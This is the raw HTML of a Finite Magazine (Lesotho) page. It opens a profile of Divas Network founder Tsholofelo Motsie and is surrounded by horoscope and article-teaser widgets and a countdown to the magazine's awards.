<div class="fb-page" data-href="https://www.facebook.com/Finite.Magazine.Lesotho/?fref=ts" data-width="325" data-height="500" data-hide-cover="false" data-show-facepile="true" data-show-posts="1"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/Finite.Magazine.Lesotho/?fref=ts"><a href="https://www.facebook.com/Finite.Magazine.Lesotho/?fref=ts">Facebook</a></blockquote></div></div>
<div style="width: 325px; font-size: 9px; color: #808080; font-weight: normal; font-family: tahoma,verdana,arial,sans-serif; line-height: 1.28; text-align: right; direction: ltr;"><a class="blname" href="http://welchlawfirm.com" target="_blank" style="color: #808080;" title=".">.</a></div>
</div></div></div>
                                    </div>
                                                                       
                                                                        <div id="aside-row-2-left">
                                        < class="moduletable "><div class="moduletable-wrapper"> <div class="sprocket-lists" data-lists="141">
	<ul class="sprocket-lists-container" data-lists-items>
		<li class="active" data-lists-item>
		<h4 class="sprocket-lists-title" data-lists-toggler>
		<a href="/index.php/42-ujnnnc/24-aries-mar-21-apr-20">			Aries (Mar 21-Apr 19)		</a>			</h4>
		<div class="sprocket-lists-item" data-lists-content>
		<div class="sprocket-padding">
						<img src="/images/Astro101_Sunsigns_Aries.png" class="sprocket-lists-image" alt="" />
						You will gravitate to the person with whom you have the deepest spiritual connection: that may your partner, your mother<span class="roksprocket-ellipsis">…</span>						<a href="/index.php/42-ujnnnc/24-aries-mar-21-apr-20" class="readon"><span>Read More</span></a>
					</div>
	</div>
</li>
<li class="active" data-lists-item>
		<h4 class="sprocket-lists-title" data-lists-toggler>
		<a href="/index.php/42-ujnnnc/25-taurus-apr-21-may-20">			Taurus (Apr 21 May 20)		</a>			</h4>
		<div class="sprocket-lists-item" data-lists-content>
		<div class="sprocket-padding">
						<img src="/images/Astro101_Sunsigns_Taurus.png" class="sprocket-lists-image" alt="" />
						Your assertiveness extends to romance, where you will find ways of ensuring your needs are met, and you are listened<span class="roksprocket-ellipsis">…</span>						<a href="/index.php/42-ujnnnc/25-taurus-apr-21-may-20" class="readon"><span>Read More</span></a>
					</div>
	</div>
</li>
	</ul>
	<div class="sprocket-lists-nav">
		<div class="sprocket-lists-pagination">
			<ul>
									    	<li class="active" data-lists-page="1"><span>1</span></li>
									    	<li data-lists-page="2"><span>2</span></li>
									    	<li data-lists-page="3"><span>3</span></li>
									    	<li data-lists-page="4"><span>4</span></li>
									    	<li data-lists-page="5"><span>5</span></li>
									    	<li data-lists-page="6"><span>6</span></li>
						</ul>
		</div>
		<div class="spinner"></div>
				<div class="sprocket-lists-arrows">
			<span class="arrow next" data-lists-next><span>&rsaquo;</span></span>
			<span class="arrow prev" data-lists-previous><span>&lsaquo;</span></span>
		</div>
			</div>
</div>
</div></>
                                    </div>
                                                                        
                                     
                                    
                                </aside>
                            </div>
                                                        <!-- END OF COlUMN LEFT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
                                    
                            <!-- COLUMN MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->                
                            <div id="component" class="span8">
                        
                                                                <div id="content-row-1" class="row-fluid">
                                    <div class="content-row-1">
                                        <div class="moduletable  "><div class="moduletable-wrapper"><div class="moduletable-wrapper-inner"><div id="btcontentslider135" style="display:none;width:auto" class="bt-cs">
			<div class="slides_container" style="width:auto;">

			<div class="slide" style="width:auto">
					<div class="bt-row bt-row-first"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="PARENTING & PREGNANCY"
						href="/index.php/service/parenting-pregnancy"> PARENTING & PREGNANCY					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Dealing with a child with colic "
						href="/index.php/service/parenting-pregnancy/16-dealing-with-a-child-with-colic"> Dealing with a child with colic  </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Dealing with a child with colic " href="/index.php/service/parenting-pregnancy/16-dealing-with-a-child-with-colic">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/710a459d5a37ddc99ca4e53d59b05091-baby-colic.jpg" alt="Dealing with a child with colic "  style="width:180px;" title="Dealing with a child with colic " />
					</a>
					</div>
										
										<div class="bt-introtext">
					Colic &ndash; a period of intense crying in a baby, an infant cries for more than three hours in a r...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Dealing with a child with colic "
							href="/index.php/service/parenting-pregnancy/16-dealing-with-a-child-with-colic"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row "  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="RELATIONSHIPS"
						href="/index.php/service/relationships"> RELATIONSHIPS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="How to Spot a True gentleman"
						href="/index.php/service/relationships/17-how-to-spot-a-true-gentleman"> How to Spot a True gentleman </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="How to Spot a True gentleman" href="/index.php/service/relationships/17-how-to-spot-a-true-gentleman">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/01ac4b58a5f14a8cb7839cbf4f5293b0-gentleman.jpg" alt="How to Spot a True gentleman"  style="width:180px;" title="How to Spot a True gentleman" />
					</a>
					</div>
										
										<div class="bt-introtext">
					Gentleman have become a niche segment, they are like those very scarce unique species which are hard...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="How to Spot a True gentleman"
							href="/index.php/service/relationships/17-how-to-spot-a-true-gentleman"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row bt-row-last"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="RELATIONSHIPS"
						href="/index.php/service/relationships"> RELATIONSHIPS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="The Single Lane"
						href="/index.php/service/relationships/18-the-single-lane"> The Single Lane </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="The Single Lane" href="/index.php/service/relationships/18-the-single-lane">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/ebdd74da25474428a7a65c32e9452074-no-image.jpg" alt="The Single Lane"  style="width:180px;" title="The Single Lane" />
					</a>
					</div>
										
										<div class="bt-introtext">
					&ldquo;Singlehood&rdquo; the state of either being &lsquo;in a relationship or not&rsquo;. Relations...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="The Single Lane"
							href="/index.php/service/relationships/18-the-single-lane"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div style="clear: both;"></div>

		</div>
		<!--end bt-main-item page	-->
				<div class="slide" style="width:auto">
					<div class="bt-row bt-row-first"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="SPORTS AND FITNESS"
						href="/index.php/service/sports-fitness"> SPORTS AND FITNESS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title=" Why we have cellulite"
						href="/index.php/service/sports-fitness/19-why-we-have-cellulite">  Why we have cellulite </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title=" Why we have cellulite" href="/index.php/service/sports-fitness/19-why-we-have-cellulite">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/ebdd74da25474428a7a65c32e9452074-no-image.jpg" alt=" Why we have cellulite"  style="width:180px;" title=" Why we have cellulite" />
					</a>
					</div>
										
										<div class="bt-introtext">
					Research proves that 90% of women all over the world are bothered by cellulite. Cellulite makes a lo...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title=" Why we have cellulite"
							href="/index.php/service/sports-fitness/19-why-we-have-cellulite"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row "  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="Real Life Stories"
						href="/index.php/promotions"> Real Life Stories					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="How I became a mom after surviving with pains of miscarriage."
						href="/index.php/promotions/20-how-i-became-a-mom-after-surviving-with-pains-of-miscarriage"> How I became a mom after surviving with... </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="How I became a mom after surviving with pains of miscarriage." href="/index.php/promotions/20-how-i-became-a-mom-after-surviving-with-pains-of-miscarriage">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/31fdcc6be4d2064884422202cc53baed-PREG.jpg" alt="How I became a mom after surviving with pains of miscarriage."  style="width:180px;" title="How I became a mom after surviving with pains of miscarriage." />
					</a>
					</div>
										
										<div class="bt-introtext">
					What started as an exciting new phase in my life ended as a nightmare! I had carried a copse for two...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="How I became a mom after surviving with pains of miscarriage."
							href="/index.php/promotions/20-how-i-became-a-mom-after-surviving-with-pains-of-miscarriage"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row bt-row-last"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="TWIN TALK"
						href="/index.php/artists/twin-talk"> TWIN TALK					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Spring clean your life…"
						href="/index.php/artists/twin-talk/21-spring-clean-your-life"> Spring clean your life… </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Spring clean your life…" href="/index.php/artists/twin-talk/21-spring-clean-your-life">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/64363ee6cf14554cc6a0be12cd98ba17-twintalks.jpg" alt="Spring clean your life…"  style="width:180px;" title="Spring clean your life…" />
					</a>
					</div>
										
										<div class="bt-introtext">
					
&ldquo;Every saint has a past and every sinner has a future.&rdquo; We all have a past and that ve...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Spring clean your life…"
							href="/index.php/artists/twin-talk/21-spring-clean-your-life"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div style="clear: both;"></div>

		</div>
		<!--end bt-main-item page	-->
				<div class="slide" style="width:auto">
					<div class="bt-row bt-row-first"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="Regulars"
						href="/index.php/artists"> Regulars					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Modernised Feminism"
						href="/index.php/artists/37-modernised-feminism"> Modernised Feminism </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Modernised Feminism" href="/index.php/artists/37-modernised-feminism">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/ebdd74da25474428a7a65c32e9452074-no-image.jpg" alt="Modernised Feminism"  style="width:180px;" title="Modernised Feminism" />
					</a>
					</div>
										
										<div class="bt-introtext">
					I grew up questioning why I had to perform certain duties mainly because I am a woman. I later reali...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Modernised Feminism"
							href="/index.php/artists/37-modernised-feminism"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row "  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="TWIN TALK"
						href="/index.php/artists/twin-talk"> TWIN TALK					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Cheers - Our limit is “beyond” the sky!"
						href="/index.php/artists/twin-talk/41-cheers-our-limit-is-beyond-the-sky"> Cheers - Our limit is “beyond” the sky!... </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Cheers - Our limit is “beyond” the sky!" href="/index.php/artists/twin-talk/41-cheers-our-limit-is-beyond-the-sky">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/982b3af96b0162f289e6727f9ce64217-IMG-20140903-WA0003.jpg" alt="Cheers - Our limit is “beyond” the sky!"  style="width:180px;" title="Cheers - Our limit is “beyond” the sky!" />
					</a>
					</div>
										
										<div class="bt-introtext">
					Yet another year has passed by, and it only feels like yesterday when 2015 began.&nbsp; We have gone...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Cheers - Our limit is “beyond” the sky!"
							href="/index.php/artists/twin-talk/41-cheers-our-limit-is-beyond-the-sky"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row bt-row-last"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="SPORTS AND FITNESS"
						href="/index.php/service/sports-fitness"> SPORTS AND FITNESS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="7 Easy Moves to Tone and Tighten Your Butt"
						href="/index.php/service/sports-fitness/42-7-easy-moves-to-tone-and-tighten-your-butt"> 7 Easy Moves to Tone and Tighten Your... </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="7 Easy Moves to Tone and Tighten Your Butt" href="/index.php/service/sports-fitness/42-7-easy-moves-to-tone-and-tighten-your-butt">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/d3655f4a4c1d7e975d27cc97c3e26580-78369398.jpg" alt="7 Easy Moves to Tone and Tighten Your Butt"  style="width:180px;" title="7 Easy Moves to Tone and Tighten Your Butt" />
					</a>
					</div>
										
										<div class="bt-introtext">
					Below are seven easy moves that will assist you in achieving that toned, firm bottom you have been d...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="7 Easy Moves to Tone and Tighten Your Butt"
							href="/index.php/service/sports-fitness/42-7-easy-moves-to-tone-and-tighten-your-butt"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div style="clear: both;"></div>

		</div>
		<!--end bt-main-item page	-->
				<div class="slide" style="width:auto">
					<div class="bt-row bt-row-first"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="RELATIONSHIPS"
						href="/index.php/service/relationships"> RELATIONSHIPS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="FIERCE"
						href="/index.php/service/relationships/44-fierce"> FIERCE </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="FIERCE" href="/index.php/service/relationships/44-fierce">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/ebdd74da25474428a7a65c32e9452074-no-image.jpg" alt="FIERCE"  style="width:180px;" title="FIERCE" />
					</a>
					</div>
										
										<div class="bt-introtext">
					Life in the Mountain Kingdom has certainly changed from the days of our fore fathers and mothers. Th...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="FIERCE"
							href="/index.php/service/relationships/44-fierce"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row "  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="RELATIONSHIPS"
						href="/index.php/service/relationships"> RELATIONSHIPS					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Keep him for life"
						href="/index.php/service/relationships/45-keep-him-for-life"> Keep him for life </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Keep him for life" href="/index.php/service/relationships/45-keep-him-for-life">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/4d19443da4d040509de90f3f14bdb356-tips.jpg" alt="Keep him for life"  style="width:180px;" title="Keep him for life" />
					</a>
					</div>
										
										<div class="bt-introtext">
					It is a truth universally acknowledged by all that a woman in possession of a decent man &nbsp;&nbsp...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Keep him for life"
							href="/index.php/service/relationships/45-keep-him-for-life"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div class="bt-row bt-row-last"  style="width:33.333333333333%" >
				<div class="bt-inner">
																	<a class="bt-category" target="_parent"
						title="Real Life Stories"
						href="/index.php/promotions"> Real Life Stories					</a>
					<br />
					
										<a class="bt-title" target="_parent"
						title="Living with HIV, living with Hope"
						href="/index.php/promotions/46-living-with-hiv-living-with-hope"> Living with HIV, living with Hope </a><br />
															<div class="bt-center">
					<a target="_parent"
						class="bt-image-link"
						title="Living with HIV, living with Hope" href="/index.php/promotions/46-living-with-hiv-living-with-hope">
						<img class="hovereffect" src="http://www.finitemagazine.co.ls/cache/mod_bt_contentslider/0bfb6c44d736ef6aa89427793b88e02a-drugs-and-syringe.jpg" alt="Living with HIV, living with Hope"  style="width:180px;" title="Living with HIV, living with Hope" />
					</a>
					</div>
										
										<div class="bt-introtext">
					
Learning about your HIV-status can be one of the most difficult experiences you go through in life...					</div>
					
										<p class="readmore">
						<a target="_parent"
							title="Living with HIV, living with Hope"
							href="/index.php/promotions/46-living-with-hiv-living-with-hope"> Read more						</a>
					</p>
					
				</div>
				<!--end bt-inner -->
			</div>
			<!--end bt-row -->
									<div style="clear: both;"></div>

		</div>
		<!--end bt-main-item page	-->
			</div>
</div>
<!--end bt-container -->
<div style="clear: both;"></div>

<script type="text/javascript">	
	if(typeof(btcModuleIds)=='undefined'){var btcModuleIds = new Array();var btcModuleOpts = new Array();}
	btcModuleIds.push(135);
	btcModuleOpts.push({
			slideEasing : 'easeInQuad',
			fadeEasing : 'easeInQuad',
			effect: 'slide,slide',
			preloadImage: 'http://www.finitemagazine.co.ls//modules/mod_bt_contentslider/tmpl/images/loading.gif',
			generatePagination: true,
			play: 5000,						
			hoverPause: true,	
			slideSpeed : 500,
			autoHeight:true,
			fadeSpeed : 500,
			equalHeight:true,
			width: 'auto',
			height: 'auto',
			pause: 100,
			preload: true,
			paginationClass: 'bt_handles',
			generateNextPrev:false,
			prependPagination:true,
			touchScreen:0	});
</script>

</div></div></div>
                                    </div>
                                </div>
                                                                                                    
                                <div id="system-message-container">
	</div>

                                <div class="page-item page-item__">

					

		<div class="item_header">
		<h2 class="item_title">
										Tsholo, queen and brains behind Divas					</h2>
	</div>
	
		
		
			
	

		
	<div class="item_fulltext"><p style="text-align: justify;"><span style="font-size: 12pt;"><img src="/images/pictures/Cover/DSC_0355.JPG" alt="DSC 0355" style="vertical-align: top;" /></span></p>
<p style="text-align: justify;"><span style="font-size: 12pt;">She could undoubtedly stand as-if not utterly scoop the prize for-most influential individual in the country right now. Very few people, especially women in this country could summon the courage to start up an initiative premised on bringing together the apparently cynical and disunited women of Lesotho, infamous of ever pulling one another down instead of supporting each other. Not so for Divas Network ringleader and founder Tsholofelo Motsie better known as simply Tsholo.</span></p> </div>

	
						 </div>

                                
								                                <div id="content-row-3" class="row-fluid">
                                    <div class="content-row-3">
                                        
                                    </div>
                                </div>
                                                                
                            </div>
                            <!-- END OF COLUMN MAIN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
            
                            <!-- COLUMN RIGHT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->                    
                                                        <!-- END OF COLUMN RIGHT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
                        </div>
                    </div>
                </div>
                
                                <div id="content-row-5">
                    <div class="content-row-5-wrapper">
                        <div class="container">
                            <div class="row-fluid">
                                <div class="moduletable  "><div class="moduletable-wrapper"><div class="moduletable-wrapper-inner"> <div class="mod_eventcountdown" id="mod_otcountdown_146">
	<div class="otcountdowntext"><h2> AWARDS COUNT DOWN</h2></div>
	<div id="OtDateCountdown" data-date="08/27/2016 12:00" style="width: 100%;"></div>
	<div class="otcountdowntext"><b>FINITE MAGAZINE WO-MEN APPRECIATION AWARDS</b></div>
		 
</div>
<style>.mod_eventcountdown { display:none; }</style><script>

jQuery( document ).ready(function($) {
	
	var ot = $("#OtDateCountdown").TimeCircles({
		"animation": "ticks",
		"bg_width": 1,
		"fg_width": 0.1,
		"circle_bg_color": "#60686f",
		"time": {
			"Days": {
				"text": "Days",
				"color": "#ffcc66",
				"show": true			},
			"Hours": {
				"text": "Hours",
				"color": "#99ccff",
				"show": true			},
			"Minutes": {
				"text": "Minutes",
				"color": "#bbffbb",
				"show": true			},
			"Seconds": {
				"text": "Seconds",
				"color": "#ff9999",
				"show": true			}
		}
	});
	$(window).resize(_.throttle(function(){
		ot.rebuild();
	}, 500));
});
</script></div></div></div>
                            </div>                    
                        </div>
                    </div>
                </div>
                   
                        
                                
                                
              
             </div> <!-- end main -->
         </div> <!-- end content-wrapper -->

         <!-- FOOTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
         <div id="footer">
                                         
              <div id="copyright-row">
                  <div class="container">   
                      <div id="trademark">
                          Copyright &copy; 2017 Finite Magazine                      </div>
                      <div id="copyright-menu">
                          <!-- DO NOT REMOVE OR CHANGE THE CONTENT BELOW, THIS THEME MAY NOT WORK PROPERLY -->
                      
                          <div id="ascopy" width="0px" style="color:black;">
                          <a href="http://www.asdesigning.com/"  target="_blank" style="color:transparent;">
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DESIG NED BY AS DESIGNING
                            </a>
                          </div>
                          </div>
                            <div id="tr" width="0px" style="color:white;">
                            <a href="http://www.bamconsultancy.co.ls/" target="_blank;" style="color:white;">
                               &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
                                &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;DESIGNED BY:&nbsp;&nbsp;BAM CONSULTANCY
                                                           </a>
                       
                      
                          <!-- DO NOT REMOVE OR CHANGE THE CONTENT ABOVE, THIS THEME MAY NOT WORK PROPERLY -->
                      </div>
                  </div>   
              </div>
         </div>
        
         <!-- END OF FOOTER ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->    
        
    <!-- END OF main container ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -->
    
        <div id="back-top">
    	<a href="#"><span></span></a>
    </div>
        
        
            
        

	</div>
</body>
</html>